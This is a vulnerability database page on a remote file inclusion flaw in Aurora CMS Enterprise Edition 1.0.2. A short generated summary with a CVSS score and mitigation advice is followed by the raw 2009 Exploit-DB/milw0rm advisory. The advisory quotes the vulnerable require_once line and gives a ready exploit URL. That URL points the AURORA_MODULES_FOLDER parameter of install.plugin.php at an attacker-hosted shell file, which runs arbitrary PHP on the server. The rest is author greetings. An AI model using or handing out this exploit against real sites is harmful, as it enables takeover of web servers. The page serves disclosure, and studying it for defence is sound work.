Aurora Content Management System (Enterprise Edition) [install.plugin.php]

vendor:

Aurora Content Management System (Enterprise Edition)

by:

EA Ngel

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Aurora Content Management System (Enterprise Edition)

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: NO

Related CWE: N/A

CPE: a:aurora_cms:aurora_cms:1.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Aurora Content Management System (Enterprise Edition) [install.plugin.php] <= Remote File Include Vulnerability

A vulnerability exists in Aurora Content Management System (Enterprise Edition) due to insufficient sanitization of user-supplied input in the 'AURORA_MODULES_FOLDER' parameter of the 'install.plugin.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious payload.

Mitigation:

Input validation should be performed to ensure that untrusted input is rejected. Additionally, the application should be configured to use the least privileged account with the least amount of privileges necessary to perform its intended function.

Source

Exploit-DB raw data:

---------------------------------------------------------------------------------------------------------------
Aurora Content Management System (Enterprise Edition) [install.plugin.php] <= Remote File Include Vulnerability 
---------------------------------------------------------------------------------------------------------------


**********************************************************************************************************************************
* [+] Author 		: EA Ngel                           									 *
* [+] Situs		: www[dot]manadocoding[dot]net										 *
* [+] Location		: Indonesia								                         	 *
* [+] Contact		: engelpemula[at]gmail[dot]com										 *
* [+] Download script	: http://biznetnetworks.dl.sourceforge.net/project/cronos/aurora/aurora_1.0.2/AURORA_1.0.2_stable.tar.gz *
*																 *															         *
**********************************************************************************************************************************


a. Dork 		: kreasikan otak-mu  :) 

b. Bug			: - install.plugin.php
                          - global $AURORA_MODULES_FOLDER;
                            require_once $AURORA_MODULES_FOLDER.'/install/classes/install.class.php';


[@] Exploit		: http://localhost/[path]/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=[moonlee.txt?]


[#] Special Thanks	: str0ke

    - manadocoding      : basix, cr4wl3r, Mr.C, cokiki, bl4ck_3n91n3, tonaas, night_prophet, blue_eye, angky_tatoki
                          g4pt3k, michel_taung, doniskynet, rezagmas, Mr.Crossbeam, bolodewo and friend's


    - Sekuritionline    : cyberlog, k1n9k0ng, fl3xu5, exnome, dbanie, d4rkz, setiawan, kujang_lapuk, jantap, k3nz0
                          and friend's   
                      
     
    - lain-lain         : akiko, steve_san, steve_diving, b0b0h0, yadiyauri, ipay, nTc, chawanua, S4NT4, my_wishdom
                          alan_sarante, jajack, chrezz,  wendyz, wishnu, kiddies, anjaz chux, is-mail, is-blank, P2, 
                          C6, missi, mizz, hygao, b1beh^p1nk, tasya, san-san and friend's


[/] Note		: NOW FAITH is the assurance (the confirmation, the title deed) of the things [we] hope for, 
                          being the proof of things [we] do not see and the conviction of their reality [faith perceiving 
                          as real fact what is not revealed to the senses].


===================================================================================================================================
= 13 September 2009 > Monalisa happy b'day!! may add up in everything, always close to God and wish u all the best. Jesus bless u =
===================================================================================================================================

# milw0rm.com [2009-09-14]